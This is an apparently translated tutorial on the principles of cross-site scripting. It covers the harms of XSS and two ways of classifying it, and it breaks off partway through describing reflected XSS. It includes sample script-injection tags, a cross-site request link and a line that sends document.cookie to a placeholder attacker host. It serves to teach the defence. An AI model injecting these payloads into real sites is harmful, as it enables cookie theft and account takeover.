The principle of XSS attack

Source: Internet
Author: User

Address reproduced in this article: http://www.2cto.com/Article/201209/156182.html

An XSS (cross-site scripting) attack is one in which an attacker inserts malicious HTML tags or JavaScript code into a web page. When a user browses to that page or performs some action on it, the injected code exploits the user's trust in the original site to trick the user or the browser into performing an unsafe operation or sending the user's private information to another website.
For example, an attacker may post a seemingly harmless link in a forum and trick users into clicking it in order to steal the private information in their cookies; or the attacker may add a malicious form to the forum so that when a user submits it, the data goes to the attacker's server rather than to the trusted site the user believed they were using.
The only way to eliminate XSS attacks entirely is to disable scripts, images and similar content, which is clearly not practical, since users need rich page content. We can, however, use a number of methods to prevent XSS attacks and to minimize the harm they cause.

The hazards of XSS attacks include:

Stealing user accounts of all kinds, such as machine login accounts, online banking accounts and administrator accounts
Controlling enterprise data, including reading, tampering with, adding and deleting sensitive enterprise data
Stealing information of high business value
Making illegal fund transfers
Forcing the victim to send e-mail
Planting malware on the website (a drive-by download, "挂马")
Controlling the victim's machine to launch attacks on other websites
Example:

<body background="javascript:alert('xss-gotcha!')">
<iframe src=javascript:alert('xss-gotcha!')></iframe>
<body onload="A();"><script>function A() { alert('xss-gotcha!'); }</script>

XSS Attack classification
Classification Method One
XSS attacks fall into two categories: attacks from other sites against the application site, and attacks from the application site against the same site or other sites.
Attacks from other sites against the application site: as the name suggests, this attack is launched externally, from an e-mail or another site. When the user clicks a link, downloads a picture or submits a form, an operation the attacker intended is carried out against the application site.
Usually the user is already logged in and holds a valid session; the XSS attacker can take advantage of that session to bypass user authentication and perform unsafe operations, for example:

<a href="http://www.2cto.com/addComment.php?subject=i%20am%20owned">check it out!</a>

With this link, as soon as a logged-in user clicks it, a subject is posted on their behalf, even though the link sits on another website.
This is why a typical mail client does not automatically load pictures from untrusted sites (a GET request to a third-party site can be sent through the src attribute of an img tag), and why a session's expiration time should be set so that it times out automatically.

Attacks from the application site against the same site or other sites: this attack is usually carried out by posting a comment on the application site, or otherwise embedding code in it, so that when a user loads the page or clicks a link, actions other than the intended ones take place. For example:

<a href="#" onmouseover="window.location = 'http://reallybadguys.net/collectcookie.php?cookie=' + escape(document.cookie);">check it out!</a>

When the user moves the mouse over the link, the cookie information is sent to the attacker's server.

Classification Method II
Another way to classify XSS (which I personally find more sensible) divides XSS attacks into three types.
Type A: a locally exploited vulnerability that exists in the client-side script of the page itself.

The attack process is as follows:

Alice sends Bob a malicious URL that she has constructed.
Bob clicks the URL and views the page.
The JavaScript in the malicious page opens a vulnerable HTML page that is installed on Bob's computer.
The vulnerable HTML page contains JavaScript that executes in the local zone of Bob's computer.
Alice's malicious script can therefore execute commands on Bob's computer with the privileges Bob holds.
Type B

Reflected vulnerability. This is similar to Type A, except that the web client receives pages generated by server-side scripts: if unvalidated user data is included in such a page without HTML entity encoding, client-side code can be injected into the dynamic page.
